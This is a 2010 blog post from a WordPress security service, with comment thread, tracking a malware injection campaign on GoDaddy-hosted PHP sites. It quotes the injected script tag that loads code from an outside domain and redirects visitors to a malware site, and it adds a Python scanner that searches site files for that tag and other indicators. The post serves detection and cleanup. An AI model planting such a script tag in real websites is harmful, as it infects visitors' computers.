On May 1, 2010, hosting providers were hacked again with malicious attacks similar to last month's, containing the kdjkfjskdfjlskdjf dot com code. WPSecurityLock has reported several sites that have been hacked for a second time. The variation appears to be the same script redirecting to different domains.
The recent attacks on self-hosted WordPress blog sites have expanded to the Joomla and Pligg platforms as well as WordPress. These latest attacks show the need for security hardening of all sites. WPSecurityLock recommends strong passwords and appropriate file permissions as well as putting in robust security measures. Webmasters are responsible for securing their sites. The hosting companies must have vulnerabilities that need to be closed.
At 8:00 am (CST) on May 1, 2010, we at WPSecurityLock reported this current issue to Godaddy's Information Security Operations department. We are awaiting feedback and will share it with you on this post as soon as it arrives.
For information on how to remove this dangerous malware on your Godaddy Linux hosting account, see this article for instructions:
Cechirecom.com.js.php - WordPress Hacked | Case Study
Please check your website and see if it redirects you to an unwanted website. Or look in your source code for the following malicious code located above the </body> tag:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
And redirects to: protectsys28-pd.xorg.pl...
This malware tries to send a virus to your visitor's computer. Here's a screenshot of what was blocked by my *AVG program:

For WordPress Hacked Site cleanup and security enhancements use our contact form.
UPDATE 5/1/2010 at 11:20 am CST: We have heard from Godaddy and they are aware and are investigating right now! As soon as they give us new information, we will update this post to keep you informed.
If your site has been infected, please send us an email with your domain name and the date and time you were attacked so we can continue to send reports to Godaddy. We want to help you as much as we can.
UPDATE: 5/1/2010 at 1:20pm CST: If your website has been infected and is not using WordPress, please email us your domain name so we can have it checked.
UPDATE 5/1/2010 at 3:09 pm CST: We just found some mystery files and code.
CAUTION: We just found some weird code in a WordPress wp-config.php file. This code was injected on April 21 on a site we are fixing now.
$GLOBALS['mr_no'] = 1;
We also found a mystery file in the root, test-soc.php, which contains the base64_decode script.
Please check your websites for this now.
If anyone has information as to what this is, please let us know.
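To check a downloaded copy of a site for the signs described in this post (the kdjkfjskdfjlskdjf.com script, the $GLOBALS['mr_no'] line, the test-soc.php file and base64_decode calls), a small scan like the one below can be used. It is an added example, not code from WPSecurityLock or Godaddy; the function names, the file extensions scanned and the sample files are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Indicators quoted in this post; nothing else about the malware is assumed.
INDICATORS = {
    "injected-script-domain": re.compile(rb"kdjkfjskdfjlskdjf\.com", re.I),
    "mr_no-global": re.compile(rb"\$GLOBALS\[\s*['\"]mr_no['\"]\s*\]"),
    "base64_decode": re.compile(rb"base64_decode\s*\(", re.I),
}
SUSPECT_NAMES = {"test-soc.php"}
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}  # assumption: types worth reading


def scan_webroot(root):
    """Return sorted (relative_path, finding) pairs for files under root."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() in SUSPECT_NAMES:
            findings.append((rel, "suspect-filename"))
        if path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        data = path.read_bytes()
        findings += [(rel, n) for n, rx in INDICATORS.items() if rx.search(data)]
    return sorted(findings)


def demo():
    """Build a constructed sample web root in a temp dir and scan it."""
    samples = {
        "index.php": '<body>hi<script src="http://kdjkfjskdfjlskdjf.com/kp.php">'
                     "</script></body>",
        "wp-config.php": "<?php\n$GLOBALS['mr_no'] = 1;\ndefine('DB_NAME', 'x');\n",
        "test-soc.php": "<?php $x = base64_decode('Y29uc3RydWN0ZWQ='); ?>",
        "wp-content/themes/clean.php": "<?php echo 'ok'; ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, text in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(text)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:24} {rel}")
```

Legitimate PHP code also calls base64_decode, so that finding marks a file to open and review rather than proof of infection.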
UPDATE 5/1/2010 at 3:10pm CST: Salem, from Godaddy.com, has left a comment below. Here's the latest update from Godaddy...
We've been in contact with WPSecurityLock.com and we're actively working with them to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK .
Please note that we also investigated and found the cause of the issue last week, and while there are similarities, we're treating this as a new and separate issue.
As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware on other CMS applications have the commonality that part of the site is powered by WordPress.
Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .
^Salem
UPDATE 5/3/2010 at 2:00pm CST: We have a conference call with the Godaddy team later this afternoon. We will keep you posted on the outcome.
We have received thousands of emails with information about websites being hacked. We truly appreciate you contacting us. We will respond as fast as humanly possible.
UPDATE 5/3/2010 at 7:13pm CST: Go Daddy cares! Here's some info...
UPDATE 5/5/2010 at 3:00pm CST: We'd like to thank Scott from Go Daddy's IT Security Operations department for speaking at our teleseminar today. The audio replay is now available on the webcast page. If you missed this event, you can still register here and listen to the replay.
Scott has provided the following helpful links for you:
How to identify the version of WordPress you're using: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/is-my-wordpress-version-up-to-date/
Our community thread on best practices for cleaning: http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it
Upgrading WordPress the "best practice" way:
http://help.godaddy.com/article/6072
Form to contact our Security Team:
www.godaddy.com/securityissue
UPDATE 5/5/2010 at 5:00 pm CST: We have just uploaded a portion of today's WordPress Security Teleseminar with Scott from Go Daddy. You can listen to the audio by pressing the play button below:
We need your help...
In order to help spread awareness about this malware attack, click the share button below to link this post to your Twitter, Facebook, email, etc.
If you have any questions or have any further information about this malicious malware, please leave a comment below so that we can keep our readers informed.
Get Secure! Stay Secure!
Allen Dresser
Internet Tech Guy
www.internettechguy.com
http://twitter.com/internettechguy
REGISTER NOW TO LISTEN TO THE AUDIO REPLAY WITH GO DADDY AND WPSECURITYLOCK!
You can still listen to our WordPress Security Teleseminar Replay with special guest, Scott from Go Daddy, recorded on May 5, 2010. Plus, you can still sign up for our May 19, 2010 at 9pm EST teleseminar. You can participate live from anywhere in the world. Click Here To Register Now!
*Denotes our affiliate link, see our Disclosure.













Please, review this topic:
http://www.simplemachines.org/community/index.php?topic=307717.0
Any news on this? I see from Kristi above that she not only used the GoDaddy restore feature but went in and did a reinstall of WordPress and STILL got re-infected. Please explain to me how this is not a GoDaddy issue?
I spent last night researching new hosts, and if anyone can point me to some good choices I would appreciate it. Will be migrating quickly before this happens again.
I'm pretty sure it is a hosting issue, but at the same time, other hosting companies have had this problem as well (recently Network Solutions, but I don't know if they're related to Godaddy). So sure, you can migrate elsewhere, but be sure to do a lot of research - every hosting company comes with its issues, whether they are security vulnerabilities, lack of backups when servers go down, billing issues, slow support, etc.
Good point. They all do have their issues.
My problem here is that GoDaddy has not reached out to its customers, and they have basically blown everyone off by pointing the blame towards WordPress (or the WP users themselves.)
Amazing that the mass attacks early Saturday morning were ALL on GoDaddy hosting. That screams "It's a GoDaddy problem" to me.
I've been a long time customer, and I would have preferred to stay with them. All they would have had to do was say "hey, we're going to help you through this. Thank you for the thousands of dollars you've spent with us. We care about your online business and we are going to find out who did this and then tighten up our end to make sure this vulnerability is fixed."
Such a let down from a company I trusted with my livelihood.
We have a conference call with Godaddy today. We will certainly give you an update on this post as soon as we have one.
Yup ... they got the same sites of mine that they got last time. I'm really curious about GoDaddy's suggestion that we all reinstall WordPress with a fresh copy. Let's set aside for a moment the fact that many people who were hacked were running the latest version of WP, and had multiple security plugins installed, and had good passwords. If we reinstall, what do we do about the .php files that are part of our themes? We can't do away with those files.
Hi Steve, thanks for this information. I just called GoDaddy and the man told me that this is more of WordPress' situation. I don't know where to get help, because I've gone to WordPress forums and asked three times over the weekend but no one has replied.
I think my site was hacked over the weekend. Some of the symptoms I noticed were whenever I press Submit Reply to my comments, a red square appears. Even though the comment goes through on the website, it doesn't go through when I'm replying. Another thing is that I can no longer upload images to my posts. The site also runs a little slower than normal. Finally, the Dashboard didn't look like it used to when I open it up on Firefox.
Everything pretty much worked okay before this weekend, but do you guys think these symptoms are due to the hack that is described in this post?
What you have to do is manually clean any files that you don't want to delete during the reinstall, which includes the wp-config file, custom wp-config file (if you moved it into the wp-includes folder as security sites suggest), and your theme php files.
What I ended up doing was deleting the wp-admin and replacing the folder with the clean WordPress install files, deleting the root WordPress install files (except wp-config) and replacing them, deleting everything in wp-includes except my custom wp-config file and replacing them, deleting everything in the wp-content / plugins folder and replacing them, deleting default & classic theme files wp-content / themes and cleaning my custom / in use theme files manually.
Pretty much, you have two options with any php file on your hacked hosted site - delete and replace with a clean copy, or open it and remove the PHP code. This last cleanup was much easier for me because I had made a clean copy backup of everything from the last time it was all hacked, but the first time, it was many, many hours of cleanup and figuring out what I had to replace, reinstall, reactivate, etc.
It is NOT just WordPress or CMS sites. Ours is just a simple php site, and it was hacked identically to the other reports. I'm sure GoDaddy was hoping that the problem was with WP because the easiest out for them is to blame the problem on someone else. Despite the fact that they are well aware (I brought it to their attention!) that it is apparently any site with PHP page extensions that was hacked, they continue to push the line that it is something to do with WP. If I were WordPress I would consider legal action against GoDaddy for blaming them for a GoDaddy security lapse. GoDaddy support blew me off completely and I am totally angry about it.
Regina, something maybe quite important - my GoDaddy-hosted WordPress blog was hacked again on Saturday, the second time in 16 days (Ninoplas). I thought for sure I closed any/all security holes the first time, so couldn't understand how it happened again. I was looking and researching for hours on how it got in again, and then finally I stumbled upon this small paragraph in your text at the top of another page on your site:
"If not removed, this malicious script has a cookie that will run again in 20 days."
(http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/)
I'm the kind of guy who NEVER clears my cookies, as I find them too convenient for keeping settings, logins etc - and always thought they weren't any real kind of security risk. But could it be that I - and all the others here - who got *reinfected* fell victim to a little-known, under-publicized secret backdoor on these things via *a browser cookie* ??
Hi JohnR,
Thanks for your comment. I would suggest cleaning your cookies and cache when you close your browsers as opposed to convenience. Although, I wish I didn't have to. Better safe than sorry.
I am not sure, at this time, if the 20-day cookie has to do with this most recent attack.
We are posting a press release in a few minutes we've received from Godaddy. So make sure you watch for that.
GoDaddy isn't being honest... it's all PHP that is affected, the only reason WP is getting the most attention is because that's the most widely used PHP application. My vBulletin on Godaddy was also victim to this same hack, second time in about 3 weeks. Multiple phone calls to Godaddy and all they will do is try and blame WP. Total BS... there is inadequate security on their server side that is permitting this.
Go Daddy cares! Here's some info...
This really ticks me off!
This is the second time in a month that my GoDaddy hosted site was compromised. I must have made 20 phone calls to them this past weekend. Each person I spoke with gave me the disclaimer that they are not in the WP business. Way to pass responsibility off GD. Seems to me that GD should be the ones to remove the base64 crud. Do you think the average person they market to actually understands all of this?
The malware code was in every PHP file. I finally had to reinstall WP, set my history back a week and delete my entire template. Yes, everything was the latest up to date version.
I'm looking for hosting with WP support.